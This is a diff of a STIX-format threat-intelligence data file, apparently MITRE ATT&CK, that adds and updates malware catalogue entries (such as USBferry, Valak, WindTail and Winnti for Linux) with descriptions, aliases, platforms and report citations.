+ "description": "Chen, J.. (2020, May 12). Tropic Trooper\u2019s Back: USBferry Attack Targets Air gapped Environments. Retrieved May 20, 2020."
+ }
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "description": "[USBferry](https://attack.mitre.org/software/S0452) is an information stealing malware and has been used by [Tropic Trooper](https://attack.mitre.org/groups/G0081) in targeted attacks against Taiwanese and Philippine air-gapped military environments. [USBferry](https://attack.mitre.org/software/S0452) shares an overlapping codebase with [YAHOYAH](https://attack.mitre.org/software/S0388), though it has several features which makes it a distinct piece of malware.(Citation: TrendMicro Tropic Trooper May 2020)",
+ "name": "USBferry",
+ "id": "malware--75bba379-4ba1-467e-8c60-ec2b269ee984",
+ "type": "malware",
+ "labels": [
+ "malware"
+ ],
+ "modified": "2020-06-16T15:52:25.167Z",
+ "created": "2020-05-20T19:54:06.476Z",
+ "x_mitre_version": "1.0",
+ "x_mitre_aliases": [
+ "USBferry"
+ ],
"x_mitre_platforms": [
"Windows"
]
@@ -201338,15 +231215,15 @@
"labels": [
"malware"
],
- "modified": "2020-03-27T22:14:18.934Z",
+ "modified": "2020-07-01T18:32:47.285Z",
"created": "2018-04-18T17:59:24.739Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Linux"
+ ],
"x_mitre_aliases": [
"Umbreon"
],
- "x_mitre_platforms": [
- "Linux"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "malware--ab3580c8-8435-4117-aace-3d9fbe46aa56",
@@ -201374,13 +231251,13 @@
],
"modified": "2020-03-30T18:25:14.290Z",
"created": "2017-05-31T21:33:15.020Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"Unknown Logger"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "malware--80a014ba-3fef-4768-990b-37d8bd10d7f4",
@@ -201475,17 +231352,51 @@
"labels": [
"malware"
],
- "modified": "2020-03-30T15:23:23.342Z",
+ "modified": "2020-06-24T13:57:16.815Z",
"created": "2019-06-04T18:42:22.552Z",
- "x_mitre_platforms": [
- "Windows"
- ],
- "x_mitre_version": "1.2",
"x_mitre_aliases": [
"Ursnif",
"Gozi-ISFB",
"PE_URSNIF",
"Dreambot"
+ ],
+ "x_mitre_version": "1.2",
+ "x_mitre_platforms": [
+ "Windows"
+ ]
+ },
+ {
+ "external_references": [
+ {
+ "external_id": "S0442",
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/software/S0442"
+ },
+ {
+ "source_name": "Kaspersky Cloud Atlas August 2019",
+ "url": "https://securelist.com/recent-cloud-atlas-activity/92016/",
+ "description": "GReAT. (2019, August 12). Recent Cloud Atlas activity. Retrieved May 8, 2020."
+ }
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "description": "[VBShower](https://attack.mitre.org/software/S0442) is a backdoor that has been used by [Inception](https://attack.mitre.org/groups/G0100) since at least 2019. [VBShower](https://attack.mitre.org/software/S0442) has been used as a downloader for second stage payloads, including [PowerShower](https://attack.mitre.org/software/S0441).(Citation: Kaspersky Cloud Atlas August 2019)",
+ "name": "VBShower",
+ "id": "malware--8caa18af-4758-4fd3-9600-e8af579e89ed",
+ "type": "malware",
+ "labels": [
+ "malware"
+ ],
+ "modified": "2020-05-12T20:56:07.174Z",
+ "created": "2020-05-08T20:43:25.743Z",
+ "x_mitre_version": "1.0",
+ "x_mitre_aliases": [
+ "VBShower"
+ ],
+ "x_mitre_platforms": [
+ "Windows"
]
},
{
@@ -201518,10 +231429,44 @@
],
"modified": "2020-03-30T18:26:04.840Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"VERMIN"
],
+ "x_mitre_version": "1.1"
+ },
+ {
+ "id": "malware--ade37ada-14af-4b44-b36c-210eec255d53",
+ "name": "Valak",
+ "description": "[Valak](https://attack.mitre.org/software/S0476) is a multi-stage modular malware that can function as a standalone or downloader, first observed in 2019 targeting enterprises in the US and Germany.(Citation: Cybereason Valak May 2020)",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "external_references": [
+ {
+ "external_id": "S0476",
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/software/S0476"
+ },
+ {
+ "source_name": "Cybereason Valak May 2020",
+ "url": "https://www.cybereason.com/blog/valak-more-than-meets-the-eye",
+ "description": "Salem, E. et al. (2020, May 28). VALAK: MORE THAN MEETS THE EYE . Retrieved June 19, 2020."
+ }
+ ],
+ "type": "malware",
+ "labels": [
+ "malware"
+ ],
+ "modified": "2020-06-24T01:11:42.794Z",
+ "created": "2020-06-19T17:11:54.854Z",
+ "x_mitre_aliases": [
+ "Valak"
+ ],
+ "x_mitre_version": "1.0",
"x_mitre_platforms": [
"Windows"
]
@@ -201561,15 +231506,21 @@
],
"modified": "2020-03-30T18:26:35.490Z",
"created": "2018-04-18T17:59:24.739Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"Vasport"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
+ "created": "2018-01-16T16:13:52.465Z",
+ "modified": "2020-03-25T13:57:35.783Z",
+ "labels": [
+ "malware"
+ ],
+ "type": "malware",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
@@ -201603,19 +231554,13 @@
"name": "Volgmer",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"id": "malware--495b6cdb-7b5a-4fbc-8d33-e7ef68806d08",
- "type": "malware",
- "labels": [
- "malware"
- ],
- "modified": "2020-03-25T13:57:35.783Z",
- "created": "2018-01-16T16:13:52.465Z",
- "x_mitre_platforms": [
- "Windows"
- ],
+ "x_mitre_version": "1.1",
"x_mitre_aliases": [
"Volgmer"
],
- "x_mitre_version": "1.1"
+ "x_mitre_platforms": [
+ "Windows"
+ ]
},
{
"id": "malware--1d808f62-cf63-4063-9727-ff6132514c22",
@@ -201652,13 +231597,13 @@
],
"modified": "2020-03-30T18:27:06.694Z",
"created": "2017-05-31T21:33:06.433Z",
- "x_mitre_version": "1.2",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"WEBC2"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.2"
},
{
"id": "malware--98e8a977-3416-43aa-87fa-33e287e9c14c",
@@ -201778,9 +231723,9 @@
"source_name": "Washington Post WannaCry 2017"
},
{
- "description": "Berry, A., Homan, J., and Eitzman, R. (2017, May 23). WannaCry Malware Profile. Retrieved March 15, 2019.",
+ "source_name": "FireEye WannaCry 2017",
"url": "https://www.fireeye.com/blog/threat-research/2017/05/wannacry-malware-profile.html",
- "source_name": "FireEye WannaCry 2017"
+ "description": "Berry, A., Homan, J., and Eitzman, R. (2017, May 23). WannaCry Malware Profile. Retrieved March 15, 2019."
},
{
"source_name": "SecureWorks WannaCry Analysis",
@@ -201792,12 +231737,11 @@
"labels": [
"malware"
],
- "modified": "2020-03-27T21:02:41.006Z",
+ "modified": "2020-05-13T22:59:51.283Z",
"created": "2019-03-25T17:30:17.004Z",
- "x_mitre_contributors": [
- "Jan Miller, CrowdStrike"
+ "x_mitre_platforms": [
+ "Windows"
],
- "x_mitre_version": "1.1",
"x_mitre_aliases": [
"WannaCry",
"WanaCry",
@@ -201805,8 +231749,9 @@
"WanaCrypt0r",
"WCry"
],
- "x_mitre_platforms": [
- "Windows"
+ "x_mitre_version": "1.1",
+ "x_mitre_contributors": [
+ "Jan Miller, CrowdStrike"
]
},
{
@@ -201844,13 +231789,13 @@
],
"modified": "2020-03-30T18:27:31.495Z",
"created": "2018-04-18T17:59:24.739Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"Wiarp"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "malware--22addc7b-b39f-483d-979a-1b35147da5de",
@@ -201878,12 +231823,56 @@
],
"modified": "2020-03-30T18:27:57.226Z",
"created": "2017-05-31T21:32:40.004Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"WinMM"
],
+ "x_mitre_version": "1.1"
+ },
+ {
+ "external_references": [
+ {
+ "external_id": "S0466",
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/software/S0466"
+ },
+ {
+ "source_name": "SANS Windshift August 2018",
+ "url": "https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1554718868.pdf",
+ "description": "Karim, T. (2018, August). TRAILS OF WINDSHIFT. Retrieved June 25, 2020."
+ },
+ {
+ "source_name": "objective-see windtail1 dec 2018",
+ "url": "https://objective-see.com/blog/blog_0x3B.html",
+ "description": "Wardle, Patrick. (2018, December 20). Middle East Cyber-Espionage analyzing WindShift's implant: OSX.WindTail (part 1). Retrieved October 3, 2019."
+ },
+ {
+ "source_name": "objective-see windtail2 jan 2019",
+ "url": "https://objective-see.com/blog/blog_0x3D.html",
+ "description": "Wardle, Patrick. (2019, January 15). Middle East Cyber-Espionage analyzing WindShift's implant: OSX.WindTail (part 2). Retrieved October 3, 2019."
+ }
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "name": "WindTail",
+ "description": "[WindTail](https://attack.mitre.org/software/S0466) is a macOS surveillance implant used by [Windshift](https://attack.mitre.org/groups/G0112). [WindTail](https://attack.mitre.org/software/S0466) shares code similarities with Hack Back aka KitM OSX.(Citation: SANS Windshift August 2018)(Citation: objective-see windtail1 dec 2018)(Citation: objective-see windtail2 jan 2019)",
+ "id": "malware--0d1f9f5b-11ea-42c3-b5f4-63cce0122541",
+ "type": "malware",
+ "labels": [
+ "malware"
+ ],
+ "modified": "2020-06-26T13:33:42.533Z",
+ "created": "2020-06-04T19:01:53.566Z",
+ "x_mitre_version": "1.0",
+ "x_mitre_aliases": [
+ "WindTail"
+ ],
"x_mitre_platforms": [
- "Windows"
+ "macOS"
]
},
{
@@ -201926,19 +231915,53 @@
],
"modified": "2020-03-30T18:29:08.243Z",
"created": "2018-01-16T16:13:52.465Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"Wingbird"
],
+ "x_mitre_version": "1.1"
+ },
+ {
+ "id": "malware--8787e86d-8475-4f13-acea-d33eb83b6105",
+ "name": "Winnti for Linux",
+ "description": "[Winnti for Linux](https://attack.mitre.org/software/S0430) is a trojan, seen since at least 2015, designed specifically for targeting Linux systems. Reporting indicates the winnti malware family is shared across a number of actors including [Winnti Group](https://attack.mitre.org/groups/G0044). The Windows variant is tracked separately under [Winnti for Windows](https://attack.mitre.org/software/S0141).(Citation: Chronicle Winnti for Linux May 2019)",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "external_references": [
+ {
+ "external_id": "S0430",
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/software/S0430"
+ },
+ {
+ "source_name": "Chronicle Winnti for Linux May 2019",
+ "url": "https://medium.com/chronicle-blog/winnti-more-than-just-windows-and-gates-e4f03436031a",
+ "description": "Chronicle Blog. (2019, May 15). Winnti: More than just Windows and Gates. Retrieved April 29, 2020."
+ }
+ ],
+ "type": "malware",
+ "labels": [
+ "malware"
+ ],
+ "modified": "2020-07-01T18:34:02.367Z",
+ "created": "2020-04-29T15:06:59.171Z",
"x_mitre_platforms": [
- "Windows"
- ]
+ "Linux"
+ ],
+ "x_mitre_aliases": [
+ "Winnti for Linux"
+ ],
+ "x_mitre_version": "1.0"
},
{
"id": "malware--d3afa961-a80c-4043-9509-282cdf69ab21",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "name": "Winnti",
- "description": "[Winnti](https://attack.mitre.org/software/S0141) is a Trojan that has been used by multiple groups to carry out intrusions in varied regions from at least 2010 to 2016. One of the groups using this malware is referred to by the same name, [Winnti Group](https://attack.mitre.org/groups/G0044); however, reporting indicates a second distinct group, [Axiom](https://attack.mitre.org/groups/G0001), also uses the malware. (Citation: Kaspersky Winnti April 2013) (Citation: Microsoft Winnti Jan 2017) (Citation: Novetta Winnti April 2015)",
+ "name": "Winnti for Windows",
+ "description": "[Winnti for Windows](https://attack.mitre.org/software/S0141) is a Trojan that has been used by multiple groups to carry out intrusions in varied regions from at least 2010 to 2016. One of the groups using this malware is referred to by the same name, [Winnti Group](https://attack.mitre.org/groups/G0044); however, reporting indicates a second distinct group, [Axiom](https://attack.mitre.org/groups/G0001), also uses the malware. (Citation: Kaspersky Winnti April 2013) (Citation: Microsoft Winnti Jan 2017) (Citation: Novetta Winnti April 2015) The Linux variant is tracked separately under [Winnti for Linux](https://attack.mitre.org/software/S0430).(Citation: Chronicle Winnti for Linux May 2019)",
"external_references": [
{
"source_name": "mitre-attack",
@@ -201946,9 +231969,9 @@
"external_id": "S0141"
},
{
- "source_name": "Kaspersky Winnti April 2013",
+ "url": "https://securelist.com/winnti-more-than-just-a-game/37029/",
"description": "Kaspersky Lab's Global Research and Analysis Team. (2013, April 11). Winnti. More than just a game. Retrieved February 8, 2017.",
- "url": "https://securelist.com/winnti-more-than-just-a-game/37029/"
+ "source_name": "Kaspersky Winnti April 2013"
},
{
"url": "https://blogs.technet.microsoft.com/mmpc/2017/01/25/detecting-threat-actors-in-recent-german-industrial-attacks-with-windows-defender-atp/",
@@ -201956,9 +231979,14 @@
"source_name": "Microsoft Winnti Jan 2017"
},
{
- "source_name": "Novetta Winnti April 2015",
+ "url": "http://www.novetta.com/wp-content/uploads/2015/04/novetta_winntianalysis.pdf",
"description": "Novetta Threat Research Group. (2015, April 7). Winnti Analysis. Retrieved February 8, 2017.",
- "url": "http://www.novetta.com/wp-content/uploads/2015/04/novetta_winntianalysis.pdf"
+ "source_name": "Novetta Winnti April 2015"
+ },
+ {
+ "source_name": "Chronicle Winnti for Linux May 2019",
+ "url": "https://medium.com/chronicle-blog/winnti-more-than-just-windows-and-gates-e4f03436031a",
+ "description": "Chronicle Blog. (2019, May 15). Winnti: More than just Windows and Gates. Retrieved April 29, 2020."
}
],
"object_marking_refs": [
@@ -201968,15 +231996,15 @@
"labels": [
"malware"
],
- "modified": "2020-03-18T16:13:37.631Z",
+ "modified": "2020-05-04T12:29:49.081Z",
"created": "2017-05-31T21:33:21.027Z",
- "x_mitre_version": "1.1",
- "x_mitre_aliases": [
- "Winnti"
- ],
"x_mitre_platforms": [
"Windows"
- ]
+ ],
+ "x_mitre_aliases": [
+ "Winnti for Windows"
+ ],
+ "x_mitre_version": "2.0"
},
{
"id": "malware--a19c49aa-36fe-4c05-b817-23e1c7a7d085",
@@ -202051,14 +232079,14 @@
],
"modified": "2020-03-30T18:30:21.733Z",
"created": "2017-12-14T16:46:06.044Z",
- "x_mitre_platforms": [
- "macOS"
- ],
+ "x_mitre_version": "1.3",
"x_mitre_aliases": [
"XAgentOSX",
"OSX.Sofacy"
],
- "x_mitre_version": "1.3"
+ "x_mitre_platforms": [
+ "macOS"
+ ]
},
{
"id": "malware--7343e208-7cab-45f2-a47b-41ba5e2f0fab",
@@ -202117,16 +232145,16 @@
],
"modified": "2020-03-21T00:40:57.275Z",
"created": "2017-05-31T21:33:09.453Z",
- "x_mitre_version": "2.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"XTunnel",
"Trojan.Shunnael",
"X-Tunnel",
"XAPS"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "2.1"
},
{
"external_references": [
@@ -202140,9 +232168,9 @@
"description": "(Citation: Unit42 Xbash Sept 2018)"
},
{
- "source_name": "Unit42 Xbash Sept 2018",
+ "description": "Xiao, C. (2018, September 17). Xbash Combines Botnet, Ransomware, Coinmining in Worm that Targets Linux and Windows. Retrieved November 14, 2018.",
"url": "https://researchcenter.paloaltonetworks.com/2018/09/unit42-xbash-combines-botnet-ransomware-coinmining-worm-targets-linux-windows/",
- "description": "Xiao, C. (2018, September 17). Xbash Combines Botnet, Ransomware, Coinmining in Worm that Targets Linux and Windows. Retrieved November 14, 2018."
+ "source_name": "Unit42 Xbash Sept 2018"
}
],
"object_marking_refs": [
@@ -202156,16 +232184,16 @@
"labels": [
"malware"
],
- "modified": "2020-03-29T18:24:47.291Z",
+ "modified": "2020-06-23T20:41:28.496Z",
"created": "2019-01-30T13:28:47.452Z",
- "x_mitre_platforms": [
- "Windows",
- "Linux"
- ],
+ "x_mitre_version": "1.2",
"x_mitre_aliases": [
"Xbash"
],
- "x_mitre_version": "1.2"
+ "x_mitre_platforms": [
+ "Windows",
+ "Linux"
+ ]
},
{
"external_references": [
@@ -202175,33 +232203,33 @@
"url": "https://attack.mitre.org/software/S0388"
},
{
- "source_name": "TrendMicro TropicTrooper 2015",
+ "description": "Alintanahin, K. (2015). Operation Tropic Trooper: Relying on Tried-and-Tested Flaws to Infiltrate Secret Keepers. Retrieved June 14, 2019.",
"url": "https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-operation-tropic-trooper.pdf",
- "description": "Alintanahin, K. (2015). Operation Tropic Trooper: Relying on Tried-and-Tested Flaws to Infiltrate Secret Keepers. Retrieved June 14, 2019."
+ "source_name": "TrendMicro TropicTrooper 2015"
}
],
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "Yahoyah is a Trojan used by [Tropic Trooper](https://attack.mitre.org/groups/G0081) as a second-stage backdoor.(Citation: TrendMicro TropicTrooper 2015)",
- "name": "Yahoyah",
+ "description": "[YAHOYAH](https://attack.mitre.org/software/S0388) is a Trojan used by [Tropic Trooper](https://attack.mitre.org/groups/G0081) as a second-stage backdoor.(Citation: TrendMicro TropicTrooper 2015)",
+ "name": "YAHOYAH",
"id": "malware--cb444a16-3ea5-4a91-88c6-f329adcb8af3",
"type": "malware",
"labels": [
"malware"
],
- "modified": "2020-03-30T18:30:56.253Z",
+ "modified": "2020-05-21T17:23:45.362Z",
"created": "2019-06-17T18:49:30.307Z",
- "x_mitre_platforms": [
- "Windows"
- ],
- "x_mitre_aliases": [
- "Yahoyah"
- ],
- "x_mitre_version": "1.1",
"x_mitre_contributors": [
"Bart Parys"
+ ],
+ "x_mitre_version": "1.1",
+ "x_mitre_aliases": [
+ "YAHOYAH"
+ ],
+ "x_mitre_platforms": [
+ "Windows"
]
},
{
@@ -202230,13 +232258,13 @@
],
"modified": "2020-03-30T02:44:21.378Z",
"created": "2017-05-31T21:32:56.394Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"ZLib"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "malware--a4f57468-fbd5-49e4-8476-52088220b92d",
@@ -202292,17 +232320,17 @@
],
"modified": "2020-03-30T03:06:29.968Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "2.1",
- "x_mitre_aliases": [
- "Zebrocy",
- "Zekapab"
+ "x_mitre_contributors": [
+ "Emily Ratliff, IBM"
],
"x_mitre_platforms": [
"Windows"
],
- "x_mitre_contributors": [
- "Emily Ratliff, IBM"
- ]
+ "x_mitre_aliases": [
+ "Zebrocy",
+ "Zekapab"
+ ],
+ "x_mitre_version": "2.1"
},
{
"id": "malware--4ab44516-ad75-4e43-a280-705dc0420e2f",
@@ -202339,13 +232367,13 @@
],
"modified": "2020-03-30T18:31:33.197Z",
"created": "2018-04-18T17:59:24.739Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"ZeroT"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "malware--552462b9-ae79-49dd-855c-5973014e157f",
@@ -202417,13 +232445,13 @@
],
"modified": "2020-03-30T18:32:20.484Z",
"created": "2019-01-29T17:59:43.600Z",
- "x_mitre_platforms": [
- "Windows"
- ],
+ "x_mitre_version": "1.1",
"x_mitre_aliases": [
"Zeus Panda"
],
- "x_mitre_version": "1.1"
+ "x_mitre_platforms": [
+ "Windows"
+ ]
},
{
"id": "malware--cfc75b0d-e579-40ae-ad07-a1ce00d49a6c",
@@ -202464,13 +232492,13 @@
],
"modified": "2020-03-30T18:32:58.702Z",
"created": "2019-09-24T12:59:57.991Z",
- "x_mitre_platforms": [
- "Windows"
- ],
- "x_mitre_version": "1.1",
"x_mitre_aliases": [
"ZxShell",
"Sensocode"
+ ],
+ "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
]
},
{
@@ -202503,17 +232531,85 @@
],
"modified": "2020-03-30T18:33:31.623Z",
"created": "2018-04-18T17:59:24.739Z",
- "x_mitre_version": "1.1",
- "x_mitre_aliases": [
- "adbupd"
+ "x_mitre_platforms": [
+ "Windows"
],
"x_mitre_contributors": [
"Ryan Becwar"
],
+ "x_mitre_aliases": [
+ "adbupd"
+ ],
+ "x_mitre_version": "1.1"
+ },
+ {
+ "external_references": [
+ {
+ "external_id": "S0471",
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/software/S0471"
+ },
+ {
+ "source_name": "Trend Micro Tick November 2019",
+ "url": "https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf",
+ "description": "Chen, J. et al. (2019, November). Operation ENDTRADE: TICK\u2019s Multi-Stage Backdoors for Attacking Industries and Stealing Classified Data. Retrieved June 9, 2020."
+ }
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "name": "build_downer",
+ "description": "[build_downer](https://attack.mitre.org/software/S0471) is a downloader that has been used by [BRONZE BUTLER](https://attack.mitre.org/groups/G0060) since at least 2019.(Citation: Trend Micro Tick November 2019)",
+ "id": "malware--d2c7f8ad-3b50-4cfa-bbb1-799eff06fb40",
+ "type": "malware",
+ "labels": [
+ "malware"
+ ],
+ "modified": "2020-06-24T17:50:33.499Z",
+ "created": "2020-06-10T18:44:10.896Z",
+ "x_mitre_version": "1.0",
+ "x_mitre_aliases": [
+ "build_downer"
+ ],
"x_mitre_platforms": [
"Windows"
]
},
+ {
+ "id": "malware--8be7c69e-d8e3-4970-9668-61de08e508cc",
+ "name": "down_new",
+ "description": " [down_new](https://attack.mitre.org/software/S0472) is a downloader that has been used by [BRONZE BUTLER](https://attack.mitre.org/groups/G0060) since at least 2019.(Citation: Trend Micro Tick November 2019)",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "external_references": [
+ {
+ "external_id": "S0472",
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/software/S0472"
+ },
+ {
+ "source_name": "Trend Micro Tick November 2019",
+ "url": "https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf",
+ "description": "Chen, J. et al. (2019, November). Operation ENDTRADE: TICK\u2019s Multi-Stage Backdoors for Attacking Industries and Stealing Classified Data. Retrieved June 9, 2020."
+ }
+ ],
+ "type": "malware",
+ "labels": [
+ "malware"
+ ],
+ "modified": "2020-06-24T01:27:32.659Z",
+ "created": "2020-06-10T19:37:49.361Z",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
+ "x_mitre_aliases": [
+ "down_new"
+ ],
+ "x_mitre_version": "1.0"
+ },
{
"id": "malware--88c621a7-aef9-4ae0-94e3-1fc87123eb24",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
@@ -202554,14 +232650,14 @@
],
"modified": "2020-03-30T18:35:11.519Z",
"created": "2017-05-31T21:32:24.937Z",
- "x_mitre_version": "2.1",
- "x_mitre_aliases": [
- "gh0st RAT"
- ],
"x_mitre_platforms": [
"Windows",
"macOS"
- ]
+ ],
+ "x_mitre_aliases": [
+ "gh0st RAT"
+ ],
+ "x_mitre_version": "2.1"
},
{
"id": "malware--9e2bba94-950b-4fcf-8070-cb3f816c5f4e",
@@ -202589,13 +232685,13 @@
],
"modified": "2020-03-30T18:36:37.734Z",
"created": "2017-05-31T21:32:46.890Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"hcdLoader"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "malware--e8268361-a599-4e45-bd3f-71c8c7e700c0",
@@ -202623,13 +232719,13 @@
],
"modified": "2020-03-30T18:37:13.552Z",
"created": "2017-05-31T21:32:45.315Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"httpclient"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "malware--2cfe8a26-5be7-4a09-8915-ea3d9e787513",
@@ -202665,14 +232761,14 @@
],
"modified": "2020-03-30T18:37:55.343Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "macOS"
+ ],
"x_mitre_aliases": [
"iKitten",
"OSX/MacDownloader"
],
- "x_mitre_platforms": [
- "macOS"
- ]
+ "x_mitre_version": "1.1"
},
{
"object_marking_refs": [
@@ -202735,9 +232831,9 @@
"url": "https://www.symantec.com/blogs/threat-intelligence/jrat-new-anti-parsing-techniques"
},
{
- "source_name": "NCSC Joint Report Public Tools",
+ "description": "The Australian Cyber Security Centre (ACSC), the Canadian Centre for Cyber Security (CCCS), the New Zealand National Cyber Security Centre (NZ NCSC), CERT New Zealand, the UK National Cyber Security Centre (UK NCSC) and the US National Cybersecurity and Communications Integration Center (NCCIC). (2018, October 11). Joint report on publicly available hacking tools. Retrieved March 11, 2019.",
"url": "https://s3.eu-west-1.amazonaws.com/ncsc-content/files/Joint%20report%20on%20publicly%20available%20hacking%20tools%20%28NCSC%29.pdf",
- "description": "The Australian Cyber Security Centre (ACSC), the Canadian Centre for Cyber Security (CCCS), the New Zealand National Cyber Security Centre (NZ NCSC), CERT New Zealand, the UK National Cyber Security Centre (UK NCSC) and the US National Cybersecurity and Communications Integration Center (NCCIC). (2018, October 11). Joint report on publicly available hacking tools. Retrieved March 11, 2019."
+ "source_name": "NCSC Joint Report Public Tools"
}
],
"description": "[jRAT](https://attack.mitre.org/software/S0283) is a cross-platform, Java-based backdoor originally available for purchase in 2012. Variants of [jRAT](https://attack.mitre.org/software/S0283) have been distributed via a software-as-a-service platform, similar to an online subscription model.(Citation: Kaspersky Adwind Feb 2016) (Citation: jRAT Symantec Aug 2018)",
@@ -202748,14 +232844,9 @@
"labels": [
"malware"
],
- "modified": "2020-03-30T18:38:35.850Z",
+ "modified": "2020-06-23T19:55:49.493Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_platforms": [
- "Linux",
- "Windows",
- "macOS",
- "Android"
- ],
+ "x_mitre_version": "2.1",
"x_mitre_aliases": [
"jRAT",
"JSocket",
@@ -202768,7 +232859,12 @@
"jBiFrost",
"Trojan.Maljava"
],
- "x_mitre_version": "2.1"
+ "x_mitre_platforms": [
+ "Linux",
+ "Windows",
+ "macOS",
+ "Android"
+ ]
},
{
"id": "malware--d906e6f7-434c-44c0-b51a-ed50af8f7945",
@@ -202818,16 +232914,16 @@
],
"modified": "2020-03-30T18:39:37.832Z",
"created": "2019-06-04T17:52:28.806Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"njRAT",
"Njw0rm",
"LV",
"Bladabindi"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "malware--800bdfba-6d66-480f-9f45-15845c05cb5d",
@@ -202855,13 +232951,13 @@
],
"modified": "2020-03-30T18:39:05.662Z",
"created": "2017-05-31T21:32:44.700Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"pngdowner"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "malware--0817aaf2-afea-4c32-9285-4dcd1df5bf14",
@@ -202893,13 +232989,13 @@
],
"modified": "2020-03-28T21:45:32.149Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.2",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
